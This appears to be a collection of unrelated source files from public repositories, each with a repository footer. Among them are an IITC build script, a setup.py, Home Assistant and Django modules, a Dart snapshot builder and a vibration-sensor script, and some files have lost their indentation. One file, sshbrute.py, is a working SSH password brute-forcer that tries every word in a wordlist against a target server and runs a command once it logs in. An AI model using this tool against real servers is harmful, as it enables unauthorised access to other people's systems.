docDir = os.path.dirname(docPath)
verbose and print(" buildPath is " + buildPath)
verbose and print(" distPath is " + distPath)
distFileModTime = os.path.getmtime(distPath) if os.path.exists(distPath) else 0
buildFileModTime = os.path.getmtime(buildPath) if os.path.exists(buildPath) else 0
script = readfile(fn)
dependencyModTime = latestDependencyModTime(script)
verbose and print (" " + fn + " " + lastModText(srcModTime) + ", last modified dependency on "
+ lastModText(dependencyModTime) + ", build version " + lastModText(buildFileModTime))
if (srcModTime > buildFileModTime or dependencyModTime > buildFileModTime):
downloadUrl = distUrlBase and distUrlBase + '/' + fn.replace("\\","/") or 'none'
updateUrl = distUrlBase and downloadUrl.replace('.user.js', '.meta.js') or 'none'
pluginName = os.path.splitext(os.path.splitext(os.path.basename(fn))[0])[0]
script = doReplacements(script, downloadUrl=downloadUrl, updateUrl=updateUrl, pluginName=pluginName)
        saveScriptAndMeta(script, outDir, fn)  # TODO: consider passing in buildPath
if not os.path.exists(distDir):
verbose and print(" os.path.makedirs(" + distDir + ")")
os.makedirs(distDir)
shutil.copy2(buildPath, distPath)
#shutil.copy2(buildPath.replace('.user.js', '.meta.js'), distPath.replace('.user.js', '.meta.js'))
#jsdocFiles.append(os.path.join(cwd,os.path.join(outDir,fn)))
else:
verbose and print (" no need to build since distribution is older than dependencies")
if jsdoc2md != None:
        possibleJSDoc = re.search(r"/\*\*[ \t\n\r]", script, re.MULTILINE)
buildFileModTime = os.path.getmtime(buildPath) if os.path.exists(buildPath) else 0;
docFileModTime = os.path.getmtime(docPath) if os.path.exists(docPath) else 0;
if (possibleJSDoc != None and (buildFileModTime > docFileModTime)): # this approach allows doc to be created outside this build.py
if not os.path.exists(docDir):
verbose and print(" os.path.makedirs(" + docDir + ")")
os.makedirs(docDir)
#docCmd = jsdoc2md + " " + os.path.join(cwd,os.path.join(outDir,fn)) + " > " + os.path.join(cwd,os.path.join("docs", os.path.basename(fn).replace(".js",".md")))
docCmd = jsdoc2md + " " + buildPath + " > " + docPath
verbose and print (" " + docCmd)
            subprocess.call(docCmd, shell=True)
fileIndex = fileIndex + 1
# jsdoc2md non user files
fileIndex = 0
others = [fn for fn in glob.glob("plugins/*.js") if ".user." not in fn]
for fn in others:
verbose and print("Processing others[" + str(fileIndex) + "] " + fn)
docPath = os.path.join(docRoot, fn.replace(".js",".md"))
docDir = os.path.dirname(docPath)
script = readfile(fn)
if jsdoc2md != None:
        possibleJSDoc = re.search(r"/\*\*[ \t\n\r]", script, re.MULTILINE)
srcModTime = os.path.getmtime(fn);
docFileModTime = os.path.getmtime(docPath) if os.path.exists(docPath) else 0;
if ((possibleJSDoc != None) and (srcModTime > docFileModTime)):
if not os.path.exists(docDir):
verbose and print("...os.path.makedirs(" + docDir + ")")
os.makedirs(docDir)
#docCmd = jsdoc2md + " " + os.path.join(cwd,os.path.join(outDir,fn)) + " > " + os.path.join(cwd,os.path.join("docs", os.path.basename(fn).replace(".js",".md")))
docCmd = jsdoc2md + " " + fn + " > " + docPath
verbose and print ("..." + docCmd)
            subprocess.call(docCmd, shell=True)
fileIndex = fileIndex + 1
# if we're building mobile too
if buildMobile:
verbose and print ("Build mobile")
if buildMobile not in ['debug','release','copyonly']:
raise Exception("Error: buildMobile must be 'debug' or 'release' or 'copyonly'")
# compile the user location script
fn = "user-location.user.js"
script = readfile("mobile/plugins/" + fn)
downloadUrl = distUrlBase and distUrlBase + '/' + fn.replace("\\","/") or 'none'
updateUrl = distUrlBase and downloadUrl.replace('.user.js', '.meta.js') or 'none'
script = doReplacements(script, downloadUrl=downloadUrl, updateUrl=updateUrl, pluginName='user-location')
saveScriptAndMeta(script, outDir, fn)
# copy the IITC script into the mobile folder. create the folder if needed
try:
os.makedirs("mobile/assets")
except:
pass
shutil.copy(os.path.join(outDir,"total-conversion-build.user.js"), "mobile/assets/total-conversion-build.user.js")
# copy the user location script into the mobile folder.
shutil.copy(os.path.join(outDir,"user-location.user.js"), "mobile/assets/user-location.user.js")
# also copy plugins
try:
shutil.rmtree("mobile/assets/plugins")
except:
pass
shutil.copytree(os.path.join(outDir,"plugins"), "mobile/assets/plugins",
# do not include desktop-only plugins to mobile assets
ignore=shutil.ignore_patterns('*.meta.js',
'force-https*', 'speech-search*', 'basemap-cloudmade*',
'scroll-wheel-zoom-disable*'))
if buildMobile != 'copyonly':
# now launch 'ant' to build the mobile project
retcode = os.system("ant %s -buildfile %s %s" % (antOptions, antBuildFile, buildMobile))
if retcode != 0:
print ("Error: mobile app failed to build. ant returned %d" % retcode)
exit(1) # ant may return 256, but python seems to allow only values <256
else:
shutil.copy("mobile/bin/IITC_Mobile-%s.apk" % buildMobile, os.path.join(outDir,"IITC_Mobile-%s.apk" % buildMobile) )
# run any postBuild commands
for cmd in settings.get('postBuild',[]):
os.system ( cmd )
verbose and print("Done, dateTimeVersion=" + dateTimeVersion + ", buildDate=" + buildDate)
# vim: ai si ts=4 sw=4 sts=4 et
| hayeswise/ingress-intel-total-conversion | wise-build.py | Python | isc | 17,501 |
'''
To create the wheel run - python setup.py bdist_wheel
'''
from setuptools import setup
import os, sys
packages = []
root_dir = os.path.dirname(__file__)
if root_dir:
os.chdir(root_dir)
for dirpath, dirnames, filenames in os.walk('lcopt'):
    # Treat every directory that contains an __init__.py as a package.
    if '__init__.py' in filenames:
pkg = dirpath.replace(os.path.sep, '.')
if os.path.altsep:
pkg = pkg.replace(os.path.altsep, '.')
packages.append(pkg)
def package_files(directory):
paths = []
for (path, directories, filenames) in os.walk(directory):
for filename in filenames:
paths.append(os.path.join('..', path, filename))
return paths
my_package_files = []
my_package_files.extend(package_files(os.path.join('lcopt', 'assets')))
my_package_files.extend(package_files(os.path.join('lcopt', 'static')))
my_package_files.extend(package_files(os.path.join('lcopt', 'templates')))
my_package_files.extend(package_files(os.path.join('lcopt', 'bin')))
def create_win_shortcuts():
    try:
        import winreg, sysconfig
        from win32com.client import Dispatch
    except ImportError:
        return 1
def get_reg(name,path):
# Read variable from Windows Registry
# From https://stackoverflow.com/a/35286642
try:
registry_key = winreg.OpenKey(winreg.HKEY_CURRENT_USER, path, 0,
winreg.KEY_READ)
value, regtype = winreg.QueryValueEx(registry_key, name)
winreg.CloseKey(registry_key)
return value
except WindowsError:
return None
def create_shortcut(where, script_name, icon=None):
scriptsDir = sysconfig.get_path('scripts')
target = os.path.join(scriptsDir, script_name + '.exe')
link_name = script_name + '.lnk'
link = os.path.join(where, link_name)
if icon is None:
icon = target
if not os.path.isdir(where):
os.mkdir(where)
shell = Dispatch('WScript.Shell')
shortcut = shell.CreateShortCut(link)
shortcut.Targetpath = target
shortcut.WorkingDirectory = scriptsDir
shortcut.IconLocation = icon
shortcut.save()
regPath = r'Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders'
desktopFolder = os.path.expandvars(os.path.normpath(get_reg('Desktop',regPath)))
startmenuFolder = os.path.expandvars(os.path.normpath(get_reg('Start Menu',regPath)))
startmenuFolder = os.path.join(startmenuFolder, 'Programs', 'Lcopt')
icon = os.path.join(root_dir, 'lcopt', 'assets', 'lcopt_icon.ico')
#target = "lcopt-launcher"
#create_shortcut(desktopFolder, target, icon)
create_shortcut(startmenuFolder, "lcopt-launcher", icon)
create_shortcut(startmenuFolder, "lcopt-settings", icon)
return 0
setup(
name='lcopt-dev',
version="0.4.3_dev",
packages=packages,
author="P. James Joyce",
author_email="pjamesjoyce@gmail.com",
license=open('LICENSE.txt').read(),
package_data={'lcopt': my_package_files},
entry_points = {
'console_scripts': [
'lcopt-launcher = lcopt.bin.lcopt_launcher:main',
'lcopt-bw2-setup = lcopt.bin.lcopt_bw2_setup:main',
'lcopt-bw2-setup-forwast = lcopt.bin.lcopt_bw2_setup_forwast:main',
'lcopt-settings = lcopt.bin.lcopt_settings:main',
]
},
#install_requires=[
#],
include_package_data=True,
url="https://github.com/pjamesjoyce/lcopt/",
download_url="https://github.com/pjamesjoyce/lcopt/archive/0.4.3.tar.gz",
long_description=open('README.md').read(),
description='An interactive tool for creating fully parameterised Life Cycle Assessment (LCA) foreground models',
keywords=['LCA', 'Life Cycle Assessment', 'Foreground system', 'Background system', 'Foreground model', 'Fully parameterised'],
classifiers=[
'Intended Audience :: End Users/Desktop',
'Intended Audience :: Developers',
'Intended Audience :: Science/Research',
'License :: OSI Approved :: BSD License',
'Operating System :: MacOS :: MacOS X',
'Operating System :: Microsoft :: Windows',
'Operating System :: POSIX',
'Programming Language :: Python',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Topic :: Scientific/Engineering :: Information Analysis',
'Topic :: Scientific/Engineering :: Mathematics',
'Topic :: Scientific/Engineering :: Visualization',
],
)
if sys.platform == 'win32':
shortcuts = create_win_shortcuts()
if shortcuts != 0:
print("Couldn't create shortcuts")
# Also consider:
# http://code.activestate.com/recipes/577025-loggingwebmonitor-a-central-logging-server-and-mon/
| pjamesjoyce/lcopt | setup.py | Python | bsd-3-clause | 4,911 |
import datetime
from ...place import Place
from ...spec import Spec
from .planet import Planet
from .dwarfplanet import DwarfPlanet
class System(Place):
"""Systems exist within galaxies, and can contain planets...
Attributes
allowedChildEntities Entity spec types that can be created from this context
spec Spec type of this Entity"""
# Things that child class SHOULDNT need to redeclare
# Things that a few child classes will need to redeclare
allowedChildEntities = [Spec.PLANET, Spec.DWARFPLANET]
# Things every child class will want to redeclare
spec = Spec.SYSTEM
# ---- Methods ---- #
def initEntityFromSpec(self, spec, key, path):
"""Attempt to initialize a specific entity using the spec type.
Will likely redefine in Places.
Arguments
spec Spec type for new entity
key Key for new entity
path Path for new entity
Return
Entity"""
        if spec == Spec.PLANET:
            planet = Planet(key, path)
            return planet
        if spec == Spec.DWARFPLANET:
            dwarfPlanet = DwarfPlanet(key, path)
            return dwarfPlanet
        raise ContextEntityConflictError("No matching child-entity for '" + self.getSpecString() + "' with spec " + spec.name)
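    # Example (hypothetical): system.initEntityFromSpec(Spec.PLANET, 'earth',
    # '/milky-way/sol/earth') returns a Planet entity for that key and path.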
| Jerad-M/ubfs | classes/custom/place/system.py | Python | apache-2.0 | 1,201 |
#!/usr/bin/python
#SSH BruteForcer
#http://www.darkc0de.com
#d3hydr8[at]gmail[dot]com
import sys, time
try:
import pexpect, pxssh
except(ImportError):
print "\nYou need the pexpect module."
print "http://www.noah.org/wiki/Pexpect\n"
sys.exit(1)
def brute(word):
print "Trying:",word
try:
s = pxssh.pxssh()
s.login (ip, user, word, login_timeout=10)
s.sendline (command)
s.prompt()
print "\n",s.before
s.logout()
print "\t[!] Login Success:",user, word,"\n"
sys.exit(1)
except Exception, e:
#print "[-] Failed"
pass
except KeyboardInterrupt:
print "\n[-] Quit\n"
sys.exit(1)
print "\n\t d3hydr8:darkc0de.com sshBrute v1.0"
print "\t----------------------------------------"
if len(sys.argv) != 4:
print "\nUsage : ./sshbrute.py <server> <user> <wordlist>"
print "Eg: ./sshbrute.py 198.162.1.1 root words.txt\n"
sys.exit(1)
ip = sys.argv[1]
user = sys.argv[2]
command = 'uname -a'
try:
words = open(sys.argv[3], "r").readlines()
except(IOError):
print "\n[-] Error: Check your wordlist path\n"
sys.exit(1)
print "\n[+] Loaded:",len(words),"words"
print "[+] Server:",ip
print "[+] User:",user
print "[+] BruteForcing...\n"
for word in words:
#Change this time if needed
time.sleep(0.5)
brute(word.replace("\n",""))
| knightmare2600/d4rkc0de | bruteforce/sshbrute.py | Python | gpl-2.0 | 1,327 |
import os
from weasyprint import HTML
import pyinotify
class EventHandler(pyinotify.ProcessEvent):
def process_IN_CREATE(self, event):
if event.pathname.endswith(".html"):
print "Creating:", event.pathname
print "Loading file"
wprint = HTML(filename=event.pathname)
print "writing thumbnail"
wprint.write_png(event.pathname.replace(".html", "_thumbnail.png")+".partial", resolution=10)
print "writing pdf"
wprint.write_pdf(event.pathname.replace(".html", ".pdf")+".partial")
print "writing png"
wprint.write_png(event.pathname.replace(".html", ".png")+".partial", resolution=300)
# Remove the ".partial" to indicate that it's done generating both.
for suffix in ('.pdf', '.png', '_thumbnail.png'):
dest = event.pathname.replace(".html", suffix)
src = dest + ".partial"
os.rename(src, dest)
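            # Writing to '<name>.partial' first and renaming afterwards means
            # directory watchers never see a half-generated PDF/PNG; a
            # same-filesystem rename is atomic.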
def main():
wm = pyinotify.WatchManager()
mask = pyinotify.IN_CREATE
handler = EventHandler()
notifier = pyinotify.Notifier(wm, handler)
wdd = wm.add_watch('./generated', mask, rec=True)
notifier.loop()
if __name__ == "__main__":
main()
| cnelsonsic/Certificator | certificator/renderer.py | Python | agpl-3.0 | 1,252 |
"""
Support for Zwave cover components.
For more details about this platform, please refer to the documentation
https://home-assistant.io/components/cover.zwave/
"""
# Because we do not compile openzwave on CI
# pylint: disable=import-error
import logging
from homeassistant.components.cover import (
DOMAIN, SUPPORT_OPEN, SUPPORT_CLOSE)
from homeassistant.components.zwave import ZWaveDeviceEntity
from homeassistant.components import zwave
from homeassistant.components.zwave import async_setup_platform # noqa # pylint: disable=unused-import
from homeassistant.components.zwave import workaround
from homeassistant.components.cover import CoverDevice
_LOGGER = logging.getLogger(__name__)
SUPPORT_GARAGE = SUPPORT_OPEN | SUPPORT_CLOSE
def get_device(value, **kwargs):
"""Create zwave entity device."""
if (value.command_class == zwave.const.COMMAND_CLASS_SWITCH_MULTILEVEL
and value.index == 0):
return ZwaveRollershutter(value)
elif (value.command_class == zwave.const.COMMAND_CLASS_SWITCH_BINARY or
value.command_class == zwave.const.COMMAND_CLASS_BARRIER_OPERATOR):
return ZwaveGarageDoor(value)
return None
class ZwaveRollershutter(zwave.ZWaveDeviceEntity, CoverDevice):
"""Representation of an Zwave roller shutter."""
def __init__(self, value):
"""Initialize the zwave rollershutter."""
ZWaveDeviceEntity.__init__(self, value, DOMAIN)
# pylint: disable=no-member
self._node = value.node
self._open_id = None
self._close_id = None
self._current_position_id = None
self._current_position = None
self._workaround = workaround.get_device_mapping(value)
if self._workaround:
_LOGGER.debug("Using workaround %s", self._workaround)
self.update_properties()
@property
def dependent_value_ids(self):
"""List of value IDs a device depends on."""
if not self._node.is_ready:
return None
return [self._current_position_id]
def update_properties(self):
"""Callback on data changes for node values."""
# Position value
if not self._node.is_ready:
if self._current_position_id is None:
self._current_position_id = self.get_value(
class_id=zwave.const.COMMAND_CLASS_SWITCH_MULTILEVEL,
label=['Level'], member='value_id')
if self._open_id is None:
self._open_id = self.get_value(
class_id=zwave.const.COMMAND_CLASS_SWITCH_MULTILEVEL,
label=['Open', 'Up'], member='value_id')
if self._close_id is None:
self._close_id = self.get_value(
class_id=zwave.const.COMMAND_CLASS_SWITCH_MULTILEVEL,
label=['Close', 'Down'], member='value_id')
if self._open_id and self._close_id and \
self._workaround == workaround.WORKAROUND_REVERSE_OPEN_CLOSE:
self._open_id, self._close_id = self._close_id, self._open_id
self._workaround = None
self._current_position = self._node.get_dimmer_level(
self._current_position_id)
@property
def is_closed(self):
"""Return if the cover is closed."""
        if self.current_cover_position is None:
            return None
        return self.current_cover_position == 0
@property
def current_cover_position(self):
"""Return the current position of Zwave roller shutter."""
if self._workaround == workaround.WORKAROUND_NO_POSITION:
return None
if self._current_position is not None:
if self._current_position <= 5:
return 0
elif self._current_position >= 95:
return 100
else:
return self._current_position
def open_cover(self, **kwargs):
"""Move the roller shutter up."""
zwave.NETWORK.manager.pressButton(self._open_id)
def close_cover(self, **kwargs):
"""Move the roller shutter down."""
zwave.NETWORK.manager.pressButton(self._close_id)
def set_cover_position(self, position, **kwargs):
"""Move the roller shutter to a specific position."""
self._node.set_dimmer(self._value.value_id, position)
def stop_cover(self, **kwargs):
"""Stop the roller shutter."""
zwave.NETWORK.manager.releaseButton(self._open_id)
class ZwaveGarageDoor(zwave.ZWaveDeviceEntity, CoverDevice):
"""Representation of an Zwave garage door device."""
def __init__(self, value):
"""Initialize the zwave garage door."""
ZWaveDeviceEntity.__init__(self, value, DOMAIN)
self.update_properties()
def update_properties(self):
"""Callback on data changes for node values."""
self._state = self._value.data
@property
def is_closed(self):
"""Return the current position of Zwave garage door."""
return not self._state
def close_cover(self):
"""Close the garage door."""
self._value.data = False
def open_cover(self):
"""Open the garage door."""
self._value.data = True
@property
def device_class(self):
"""Return the class of this device, from component DEVICE_CLASSES."""
return 'garage'
@property
def supported_features(self):
"""Flag supported features."""
return SUPPORT_GARAGE
| morphis/home-assistant | homeassistant/components/cover/zwave.py | Python | apache-2.0 | 5,545 |
import unittest
import random
from stanford_algoritms_part1.build_blocks import partioners
class TestSequenceFunctions(unittest.TestCase):
def setUp(self):
        self.seq = list(range(10))
def test_shuffle(self):
# make sure the shuffled sequence does not lose any elements
random.shuffle(self.seq)
self.seq.sort()
        self.assertEqual(self.seq, list(range(10)))
def test_part(self):
in_array = [3, 8, 2, 5, 1, 4, 7, 6]
partitioner = partioners.Partitioner()
partitioner.partition(in_array)
self.assertEqual(3, in_array[2])
        self.assertTrue(min(in_array[3:]) > 3)
| zaqwes8811/my-courses | my-cs/intern/java_details/java_sort_selection_details/partioners_test.py | Python | apache-2.0 | 637 |
from django.db import models
from django.utils.crypto import get_random_string
# Create your models here.
class NagMessage(models.Model):
nag_id = models.CharField(max_length=32)
message = models.TextField(null=True)
enable = models.BooleanField(default=False)
@staticmethod
def get():
if NagMessage.objects.count() == 0:
nag = NagMessage(
nag_id=get_random_string(32),
message=''
)
nag.save()
else:
nag = NagMessage.objects.first()
return nag
@staticmethod
def update(message, enable):
nag = NagMessage.get()
nag.nag_id = get_random_string(32)
nag.message = message
nag.enable = enable if message else False
nag.save()
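# Example usage (hypothetical):
#   NagMessage.update('Maintenance tonight at 22:00', True)  # show a nag
#   NagMessage.update('', False)                             # clear it
# nag_id is regenerated on every update, so clients can cheaply detect change.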
| Maronato/SpottedBot | main/models.py | Python | agpl-3.0 | 797 |
import requests
from .Backup import Backup
from .BackupContainer import BackupContainer
from .Bridge import Bridge
from .BridgeCreate import BridgeCreate
from .BridgeCreateSetting import BridgeCreateSetting
from .CPUInfo import CPUInfo
from .CPUStats import CPUStats
from .CloudInit import CloudInit
from .Cluster import Cluster
from .ClusterCreate import ClusterCreate
from .Container import Container
from .ContainerListItem import ContainerListItem
from .ContainerNIC import ContainerNIC
from .ContainerNICconfig import ContainerNICconfig
from .ContainerUpdate import ContainerUpdate
from .CoreStateResult import CoreStateResult
from .CoreSystem import CoreSystem
from .CreateContainer import CreateContainer
from .CreateSnapshotReqBody import CreateSnapshotReqBody
from .DHCP import DHCP
from .Dashboard import Dashboard
from .DashboardListItem import DashboardListItem
from .DeleteFile import DeleteFile
from .DiskInfo import DiskInfo
from .DiskPartition import DiskPartition
from .EnumBridgeCreateNetworkMode import EnumBridgeCreateNetworkMode
from .EnumBridgeStatus import EnumBridgeStatus
from .EnumClusterCreateClusterType import EnumClusterCreateClusterType
from .EnumClusterCreateDriveType import EnumClusterCreateDriveType
from .EnumClusterCreateMetaDriveType import EnumClusterCreateMetaDriveType
from .EnumClusterDriveType import EnumClusterDriveType
from .EnumClusterStatus import EnumClusterStatus
from .EnumContainerListItemStatus import EnumContainerListItemStatus
from .EnumContainerNICStatus import EnumContainerNICStatus
from .EnumContainerNICType import EnumContainerNICType
from .EnumContainerStatus import EnumContainerStatus
from .EnumDiskInfoType import EnumDiskInfoType
from .EnumGWNICType import EnumGWNICType
from .EnumGetGWStatus import EnumGetGWStatus
from .EnumJobResultName import EnumJobResultName
from .EnumJobResultState import EnumJobResultState
from .EnumNicLinkType import EnumNicLinkType
from .EnumNodeStatus import EnumNodeStatus
from .EnumStoragePoolCreateDataProfile import EnumStoragePoolCreateDataProfile
from .EnumStoragePoolCreateMetadataProfile import EnumStoragePoolCreateMetadataProfile
from .EnumStoragePoolDataProfile import EnumStoragePoolDataProfile
from .EnumStoragePoolDeviceStatus import EnumStoragePoolDeviceStatus
from .EnumStoragePoolListItemStatus import EnumStoragePoolListItemStatus
from .EnumStoragePoolMetadataProfile import EnumStoragePoolMetadataProfile
from .EnumStoragePoolStatus import EnumStoragePoolStatus
from .EnumStorageServerStatus import EnumStorageServerStatus
from .EnumVMListItemStatus import EnumVMListItemStatus
from .EnumVMStatus import EnumVMStatus
from .EnumVdiskCreateType import EnumVdiskCreateType
from .EnumVdiskListItemStatus import EnumVdiskListItemStatus
from .EnumVdiskListItemType import EnumVdiskListItemType
from .EnumVdiskStatus import EnumVdiskStatus
from .EnumVdiskType import EnumVdiskType
from .EnumZerotierListItemType import EnumZerotierListItemType
from .EnumZerotierType import EnumZerotierType
from .EventType import EventType
from .ExportVM import ExportVM
from .FTPUrl import FTPUrl
from .Filesystem import Filesystem
from .FilesystemCreate import FilesystemCreate
from .GW import GW
from .GWCreate import GWCreate
from .GWHost import GWHost
from .GWNIC import GWNIC
from .GWNICconfig import GWNICconfig
from .GetGW import GetGW
from .Graph import Graph
from .GraphUpdate import GraphUpdate
from .HTTPProxy import HTTPProxy
from .HTTPType import HTTPType
from .HealthCheck import HealthCheck
from .IPProtocol import IPProtocol
from .Image import Image
from .ImageImport import ImageImport
from .ImportVM import ImportVM
from .Job import Job
from .JobListItem import JobListItem
from .JobResult import JobResult
from .ListGW import ListGW
from .MemInfo import MemInfo
from .Message import Message
from .MigrateGW import MigrateGW
from .NicInfo import NicInfo
from .NicLink import NicLink
from .Node import Node
from .NodeHealthCheck import NodeHealthCheck
from .NodeMount import NodeMount
from .NodeReboot import NodeReboot
from .OSInfo import OSInfo
from .PortForward import PortForward
from .Process import Process
from .ProcessSignal import ProcessSignal
from .Snapshot import Snapshot
from .StorageClusterHealthCheck import StorageClusterHealthCheck
from .StoragePool import StoragePool
from .StoragePoolCreate import StoragePoolCreate
from .StoragePoolDevice import StoragePoolDevice
from .StoragePoolListItem import StoragePoolListItem
from .StorageServer import StorageServer
from .VDiskLink import VDiskLink
from .VM import VM
from .VMCreate import VMCreate
from .VMDiskInfo import VMDiskInfo
from .VMInfo import VMInfo
from .VMListItem import VMListItem
from .VMMigrate import VMMigrate
from .VMNicInfo import VMNicInfo
from .VMUpdate import VMUpdate
from .Vdisk import Vdisk
from .VdiskCreate import VdiskCreate
from .VdiskListItem import VdiskListItem
from .VdiskResize import VdiskResize
from .VdiskRollback import VdiskRollback
from .VdiskStorage import VdiskStorage
from .Webhook import Webhook
from .WebhookUpdate import WebhookUpdate
from .WriteFile import WriteFile
from .Zerotier import Zerotier
from .ZerotierBridge import ZerotierBridge
from .ZerotierJoin import ZerotierJoin
from .ZerotierListItem import ZerotierListItem
from .ZerotierRoute import ZerotierRoute
from .client import Client as APIClient
from .oauth2_client_itsyouonline import Oauth2ClientItsyouonline
class Client:
def __init__(self, base_uri=""):
self.api = APIClient(base_uri)
        self.oauth2_client_itsyouonline = Oauth2ClientItsyouonline()
| zero-os/0-orchestrator | pyclient/zeroos/orchestrator/client/__init__.py | Python | apache-2.0 | 5,568 |
#!/usr/bin/env python3
#
# Copyright (c) 2012, the Dart project authors. Please see the AUTHORS file
# for details. All rights reserved. Use of this source code is governed by a
# BSD-style license that can be found in the LICENSE file.
"""Script to create snapshot bin file."""
import optparse
import os
import sys
import utils
def BuildOptions():
result = optparse.OptionParser()
result.add_option(
"--executable",
action="store",
type="string",
help="path to snapshot generator executable")
result.add_option(
"--snapshot_kind",
action="store",
type="string",
help="kind of snapshot to generate",
default="core")
result.add_option(
"--vm_flag",
action="append",
type="string",
default=[],
help="pass additional Dart VM flag")
result.add_option(
"--vm_output_bin",
action="store",
type="string",
help="output file name into which vm isolate snapshot in binary form " +
"is generated")
result.add_option(
"--vm_instructions_output_bin",
action="store",
type="string",
help="output file name into which vm isolate snapshot in binary form " +
"is generated")
result.add_option(
"--isolate_output_bin",
action="store",
type="string",
help="output file name into which isolate snapshot in binary form " +
"is generated")
result.add_option(
"--isolate_instructions_output_bin",
action="store",
type="string",
help="output file name into which isolate snapshot in binary form " +
"is generated")
result.add_option(
"--script",
action="store",
type="string",
help="Dart script for which snapshot is to be generated")
result.add_option(
"--packages",
action="store",
type="string",
help="package config file used to reasolve package: imports.")
result.add_option(
"-v",
"--verbose",
help='Verbose output.',
default=False,
action="store_true")
result.add_option(
"--timestamp_file",
action="store",
type="string",
help="Path to timestamp file that will be written",
default="")
return result
def ProcessOptions(options):
if not options.executable:
sys.stderr.write('--executable not specified\n')
return False
if not options.snapshot_kind:
sys.stderr.write('--snapshot_kind not specified\n')
return False
if not options.vm_output_bin:
sys.stderr.write('--vm_output_bin not specified\n')
return False
if not options.isolate_output_bin:
sys.stderr.write('--isolate_output_bin not specified\n')
return False
if (options.snapshot_kind == 'core-jit' and
not options.vm_instructions_output_bin):
sys.stderr.write('--vm_instructions_output_bin not specified\n')
return False
if (options.snapshot_kind == 'core-jit' and
not options.isolate_instructions_output_bin):
sys.stderr.write('--isolate_instructions_output_bin not specified\n')
return False
return True
def CreateTimestampFile(options):
if options.timestamp_file != '':
dir_name = os.path.dirname(options.timestamp_file)
if not os.path.exists(dir_name):
os.mkdir(dir_name)
open(options.timestamp_file, 'w').close()
def Main():
# Parse options.
parser = BuildOptions()
(options, args) = parser.parse_args()
if not ProcessOptions(options):
parser.print_help()
return 1
# If there are additional arguments, report error and exit.
if args:
parser.print_help()
return 1
# Setup arguments to the snapshot generator binary.
script_args = ["--ignore_unrecognized_flags"]
for flag in options.vm_flag:
script_args.append(flag)
# Pass along the packages if there is one.
if options.packages:
script_args.append(''.join(["--packages=", options.packages]))
# First setup the vm isolate and regular isolate snapshot output filename.
script_args.append(''.join(["--snapshot_kind=", options.snapshot_kind]))
script_args.append(''.join(["--vm_snapshot_data=", options.vm_output_bin]))
script_args.append(''.join(
["--isolate_snapshot_data=", options.isolate_output_bin]))
    if options.vm_instructions_output_bin is not None:
script_args.append(''.join(
["--vm_snapshot_instructions=",
options.vm_instructions_output_bin]))
    if options.isolate_instructions_output_bin is not None:
script_args.append(''.join([
"--isolate_snapshot_instructions=",
options.isolate_instructions_output_bin
]))
# Finally append the script name if one is specified.
if options.script:
script_args.append(options.script)
# Construct command line to execute the snapshot generator binary and invoke.
command = [options.executable] + script_args
try:
utils.RunCommand(
command,
outStream=sys.stderr,
errStream=sys.stderr,
verbose=options.verbose,
printErrorInfo=True)
except Exception as e:
return -1
# Success, update timestamp file.
CreateTimestampFile(options)
return 0
if __name__ == '__main__':
sys.exit(Main())
| dart-lang/sdk | runtime/tools/create_snapshot_bin.py | Python | bsd-3-clause | 5,553 |
# ADXL345 Python Check Vibration
#
# author: Ben Jung
# license: BSD
from adxl345 import ADXL345
from math import sqrt
import time
import requests
URL = 'http://admin.kaist.ac.kr:3535/get_data?'
ID = '1'
ON_OFF_STANDARD = 0.12
SLEEP_DELAY = 0.1
ACCUMULATED_NUMBER = 10
ACCUMULATED_STANDARD = 10
# Use BLE Beacon
BLE_USED = False
# Fixed hex
BLE_HEX_FIXED_FORWARD = 'sudo hcitool -i hci0 cmd 0x08 0x0008 1E 02 01 1A 1A FF 4C 00 02 15 E2 0A 39 F4 73 F5 4B C4 A1 2F 17 D1 AD 07 A9 61 '
# Major (Machine id)
BLE_HEX_MACHINE_ID = '00 0' + ID + ' '
# Minor (State 0: idle, 1: running)
BLE_HEX_STATE_IDLE = '00 00 '
BLE_HEX_STATE_RUN = '00 01 '
BLE_HEX_FIXED_BACK = 'C8 00 '
if BLE_USED:
from subprocess import call, Popen
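# check_onoff estimates vibration as the sum of Euclidean distances between
# consecutive (x, y, z) samples over ACCUMULATED_NUMBER readings; a sum above
# ON_OFF_STANDARD is treated as "machine running".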
def check_onoff(adxl345):
std = 0
x, y, z = 0, 0, 0
for i in range(ACCUMULATED_NUMBER):
axes = adxl345.getAxes(True)
x_before, y_before, z_before = x, y, z
x, y, z = axes['x'], axes['y'], axes['z']
if i != 0:
std += sqrt((x-x_before)**2 + (y-y_before)**2 + (z-z_before)**2)
time.sleep(SLEEP_DELAY)
if std > ON_OFF_STANDARD:
print "- ON " + str(std)
return True
else:
print "- OFF " + str(std)
return False
def send_state(state):
if state:
print "* Send running_state"
r = requests.get(URL+'id='+ID+'&state=run')
else:
print "* Send idle_state"
r = requests.get(URL+'id='+ID+'&state=idle')
def change_beacon_state(state):
if state:
print "* Beacon_state running"
msg = BLE_HEX_FIXED_FORWARD + BLE_HEX_MACHINE_ID + BLE_HEX_STATE_RUN + BLE_HEX_FIXED_BACK
call(msg, shell=True)
else:
print "* Beacon_state idle"
msg = BLE_HEX_FIXED_FORWARD + BLE_HEX_MACHINE_ID + BLE_HEX_STATE_IDLE + BLE_HEX_FIXED_BACK
call(msg, shell=True)
if __name__ == "__main__":
adxl345 = ADXL345()
is_running = False
count = 0
send_state(is_running)
if BLE_USED:
Popen(['./scripts/init.sh'], shell=True)
change_beacon_state(is_running)
while True:
if check_onoff(adxl345):
if count < ACCUMULATED_STANDARD*2:
count += 1
if not is_running and count > ACCUMULATED_STANDARD:
is_running = True
send_state(is_running)
if BLE_USED:
change_beacon_state(is_running)
else:
if count > 0:
count -= 1
if is_running and count < ACCUMULATED_STANDARD+1:
is_running = False
send_state(is_running)
if BLE_USED:
change_beacon_state(is_running)
| ben-jung/iow-rpi | sensor.py | Python | bsd-2-clause | 2,702 |
#!/usr/bin/python
# Copyright 2002 Vladimir Prus
# Distributed under the Boost Software License, Version 1.0.
# (See accompanying file LICENSE_1_0.txt or http://www.boost.org/LICENSE_1_0.txt)
# Tests that 'make' accepts targets from other directories and that the
# build request for those targets can be overridden.
from BoostBuild import Tester, List
t = Tester()
t.set_tree("test1")
t.run_build_system("-sTOOLSET=yfc")
t.expect_addition("bin/a.obj/yfc/debug/runtime-link-dynamic/a.obj")
t.expect_addition("auxillary/bin/b.obj/yfc/debug/runtime-link-dynamic/optimization-space/b.obj")
t.expect_addition("bin/a/yfc/debug/runtime-link-dynamic/a")
